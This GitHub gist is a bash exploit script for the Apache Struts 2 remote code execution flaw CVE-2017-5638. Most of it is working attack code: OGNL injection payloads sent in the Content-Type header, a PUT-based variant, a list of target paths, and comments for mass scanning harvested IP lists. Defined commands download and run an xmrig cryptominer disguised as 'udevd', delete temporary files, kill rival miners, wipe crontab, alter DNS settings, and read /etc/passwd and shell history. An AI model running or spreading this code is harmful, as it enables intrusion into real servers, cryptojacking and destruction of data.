Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
#!/bin/bash
#
# Poc
#
# ./CVE-2017-5638.sh 192.168.9.3
#
# by f0r34chb3t4 - Qui Abr 12 21:00:24 -03 2018
#
# CVE-2017-5638
# Apache Struts 2 Vulnerability Remote Code Execution
# grep -iP 'mod_jk|Servlet|Tomcat|JBoss|Apache-Coyote|JSESSIONID|Jenkins|CJServer|Jetty|GlassFish|Oracle|Payara|JSP/' out.out|awk '{print $2}' > ips3
#https://waf.ninja/struts2-vulnerability-evolution/
#https://github.com/frohoff/ysoserial
#Server: nginx
#Server: Jetty
#Server: Apache-Coyote
#Server: GlassFish
#X-Powered-By: Servlet
#Set-Cookie: JSESSIONID=
#X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
#Server: Oracle-Application-Server-11g
#Server: TWebAP
#Server: nginx
#awk '{print $2,substr($5, 1, length($5)-13)}' out-81.out|sort -u|sort -R| xargs -P2000 -l timeout 60 ./xpl.sh 2>/dev/null
#awk '{print $2,substr($5, 1, length($5)-13)}' out-81.out|sort -u|sort -R| parallel -j256 --delay 1 --colsep ' ' ./xpl.sh {1} {2}
readonly IPv4="$1"
readonly PORT=${2:-80}
[ -z "${IPv4}" ] && exit 1
[ -z "${PORT}" ] && exit 1
sleep .$[ ( $RANDOM % 4 ) + 1 ]s
#readonly COOKIE=$( mktemp --dry-run )
readonly COOKIE='xXxXxXxXxXx.dat'
#trap "rm -rf ${COOKIE}" EXIT
#readonly CMD='echo \\win\\n\\n\\n\\n'
#readonly CMD_LNX='echo \\win\\n\\n\\n\\n'
#readonly CMD_WIN='echo \\win\\n\\n\\n\\n'
readonly CMD='whoami'
readonly CMD_LNX='whoami'
readonly CMD_WIN='whoami'
#readonly CMD_LNX='ps xf;cd /tmp;ls -lia;curl -s https://transfer.sh/ZSjCf/xmrig > udevd || wget -q -O udevd https://transfer.sh/ZSjCf/xmrig;chmod +x udevd;./udevd;rm -rf udevd;ps xf;exit'
#readonly CMD_WIN='echo \\win\\n\\n\\n\\n'
#readonly CMD='whoami;id;uname -a;hostname;ls -lia;cat /etc/passwd;ps xf;ss -tnp;tail -n100 ~/.bash_history'
#readonly PAYLOAD="%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"${CMD}"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
readonly TIMEOUT=5
readonly CONNECT_TIMEOUT=5
readonly MAX_TIME=5
readonly USERAGENT='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0'
readonly GOOD_KEY=$( head /dev/urandom | tr -dc A-F0-9 | head -c10 )
readonly EXEC='(#os=@java.lang.System@getProperty("os.name")).(#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("Set-Cookie","'${GOOD_KEY}'="+#os))'
#readonly PAYLOAD='%{(#_="multipart/form-data").(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context["com.opensymphony.xwork2.ActionContext.container"]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).'"${EXEC}"'}'
readonly CMD_KILL='rm -rf /tmp/* /var/tmp/*;ps xf | grep -v grep | grep -E "./nice|./Linux2.6|./atd|./bibi|./usbd|./ddos|config.json|supsplk|nbu.cf|/bin/wipefs|0x4022b1dd|/usr/bin/.sfhd|tcp.ngrok.io|./cmwxd|sleep 3600|minexmr|./LinuxTF|./fdased|./brb|./l6us|./l6us|./xt9527|/usr/bin/.sshd|360.6|./and|./udp12345|./we2dafw|./adwes|./2ew3da1ewa|./542esdew|./llin|./ag|crond|UCM_SIP.exe|./ps|UCM_MS.exe|/tmp/.|logo3.jpg|./mass|sesion.php|lol2.tar.gz|larva.sh|./run.sh|./777dead|/tmp/XMRSH|./ntion|./654|./.conest|./linux|./hpdzsd|oracle.jpg|lol1.tar.gz|hashvault|eeme7j.win|xmrig|nicehash|crawler.weibo|243/44444|cryptonight|stratum|gpg-daemon|jobs.flu.cc|nmap|cranberry|start.sh|watch.sh|krun.sh|killTop.sh|cpuminer|/60009|ssh_deny.sh|clean.sh|./over|mrx1|redisscan|ebscan|redis-cli|barad_agent|.sr0|clay|udevs|/tmp/init|pnscan" | while read pid _; do kill -9 $pid; done;ps xf;crontab -r;exit'
readonly CMD_MISC='echo "nameserver 8.8.4.4" >> /etc/resolv.conf;echo "nameserver 8.8.8.8" >> /etc/resolv.conf;echo 128 > /proc/sys/vm/nr_hugepages;sysctl -w vm.nr_hugepages=128;exit'
readonly CMD_XMRIG='cd /tmp;curl -s https://transfer.sh/b3sa7/xmrig > udevd || wget -q -O udevd https://transfer.sh/b3sa7/xmrig;chmod +x udevd;./udevd;rm -rf udevd;exit'
#readonly CMD_EXEC="((${CMD_KILL})2>/dev/null;(${CMD_MISC})2>/dev/null;(${CMD_XMRIG})2>/dev/null) & (ps xf;id;uname -a)"
#readonly CMD_EXEC="((${CMD_XMRIG})2>/dev/null &);uname -a;id;hostname;ps xf;exit"
readonly CMD_EXEC='uname -a;id;hostname;exit'
readonly PAYLOAD="%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='tasklist').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c','"${CMD_EXEC}"'})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
#sudo -u bebete
function hrce(){
local url="$1"
curl --tcp-nodelay --globoff -H 'Accept-Encoding: identity' --location --max-redirs 5 -ivIs --insecure --connect-timeout ${CONNECT_TIMEOUT} --max-time ${MAX_TIME} --user-agent "${USERAGENT}" --url "${url}"
}
#sudo -u bebete
function rce(){
local url="$1"
curl --tcp-nodelay --globoff -H 'Accept-Encoding: identity' --location --max-redirs 5 -ivs -b ${COOKIE} -c ${COOKIE} --insecure --connect-timeout ${CONNECT_TIMEOUT} --max-time ${MAX_TIME} --user-agent "${USERAGENT}" -H 'Content-Type: '"${PAYLOAD}" --url "${url}"
}
# exploit PUT METHOD
function put_rce(){
local url="$1"
local JSESSIONID=$( head /dev/urandom | tr -dc A-F0-9 | head -c32 )
curl -svi -X PUT -0 \
--location --max-redirs 3 \
-H 'Content-Type: '"${PAYLOAD}" \
-H 'Connection: close' \
-H 'Content-Length: 0' \
-H "Cookie: JSESSIONID=${JSESSIONID}" \
-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' \
-H 'Accept-Language: en-US,en;q=0.5' \
-H 'Accept-Encoding: identity' \
--connect-timeout ${CONNECT_TIMEOUT} \
--max-time ${MAX_TIME} \
--user-agent "${USERAGENT}" \
--url "${url}"
}
function check(){
local url="$1"
local buffer="$2"
local os=$( grep -F 'Set-Cookie:' <<< "${buffer}" | tr -d $'\r' | grep -F "${GOOD_KEY}" | cut -d '=' -f2- | head -n1 )
if [ ! -z "${os}" ]; then
printf '[+] vul: %s os: %s\n' "${url}" "${os}" | tee -a vul-os.dat
exit 0
fi
if grep -qF 'winnnnn' <<< "${buffer}";then
printf '[+] vul lnx: %s\n\n%s\n\n' "${url}" "${buffer}" | tee -a vul-lnx.dat
exit 0
fi
if grep -qF '\win\n\n\n\n' <<< "${buffer}";then
printf '[+] vul win: %s\n\n%s\n\n' "${url}" "${buffer}" | tee -a vul-win.dat
exit 0
fi
if ! grep -qF 'HTTP/1.' <<< "${buffer}";then
exit 1
fi
}
################################################################################
# path list
################################################################################
read -d '\n' -r PATH_LIST <<-'TXT'
/index.do
/public/
/login
/login.html
/iframe/index!index.action
/index.action
/user/login.action
/LoginForm
/main.html
/system/Login.do
/bbs/bbs/view.act
/help.action
/userlogin!doDefault.action
/default.action
/login.action
/admin.action
/auth/start
/Pages/login?domain_login=true
/admin/index.do
/ipmsLogin.jsp
/dhis-web-commons/security/login.action
/security/login.hlt
/security/
/Default.action
/login.do
/index!index.action
/site/index.action
/showNews.action
/app/login.action
/app/
/WebApp/
/pages/common/sessonExceptionPage.jsp
/pages/
/common/
/ezon/
/bamboo/about.action
/bamboo/
/viewAdministrators.action
/content!mail.action
/base.action?page=login
/eDocs-Accounts/
/user/main-1.html
/edms/index.do
/login.jsp
/invoice-homepage/
/login/
/admin/
/web/loginPage.do2
/web/
/vas/
/Index_showIndex.do
/userLogin.action
/index2.jsp
/orders.xhtml
/struts2-showcase/index.action
/login-before.xhtml
/account/login.jsp
/service/
/admin/timeout.jsp
/Secure/
/portal/
/upload/
/themes/
/content/
/var/
/cache/
/welcome
/anonymous/login.xhtml
/Tomcat
/JBoss
/common/index/style/login/loginJY.jsp
/index?first=true
/cms/login
/cms/
/login_authLogin.action
/error/errorEvents.action
/j_spring_security_check
/login.action?login_error=1
/Login!start.action
TXT
#res="$( hrce "http://${IPv4}:${PORT}/" )"
#if ! grep -qiP 'mod_jk|nginx|Servlet|Tomcat|JBoss|Apache-Coyote|JSESSIONID|Jenkins|CJServer|Jetty|GlassFish|Oracle|Payara|JSP/' <<< "${res}";then
# printf '[+] init: %s\n' "http://${IPv4}:${PORT}"
#else
# printf '[-] exit: %s\n' "http://${IPv4}:${PORT}"
# exit 1
#fi
#check "http://${IPv4}:${PORT}/" "$( rce "http://${IPv4}:${PORT}/" )"
#echo "${CMD_EXEC}"
#exit 0
rce "http://${IPv4}:${PORT}/"
#echo "${PAYLOAD}"
exit 0
res="$( put_rce "http://${IPv4}:${PORT}/Hello.World" )"
if grep -qP 'uid=[0-9]{1,5}\(.+?\)' <<< "${res}"; then
printf '[+] vul: %s\n' "http://${IPv4}:${PORT}" | tee -a vul.dat
printf '%s\n\n' "${res}"
fi
exit 0
for XPATH in ${PATH_LIST};do
check "http://${IPv4}:${PORT}${XPATH}" "$( rce "http://${IPv4}:${PORT}${XPATH}" )"
done
#if grep -qP 'uid=[0-9]{1,5}\(.+?\)' <<< "${res}"; then
# printf '[+] vul: %s\n' ${IPv4}
# printf '\n\n%s\n\n' "${res}"
#fi
#check "https://${IPv4}" "$( rce "https://${IPv4}" )"
#check "${IPv4}:8080" "$( rce "${IPv4}:8080" )"
exit 0
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.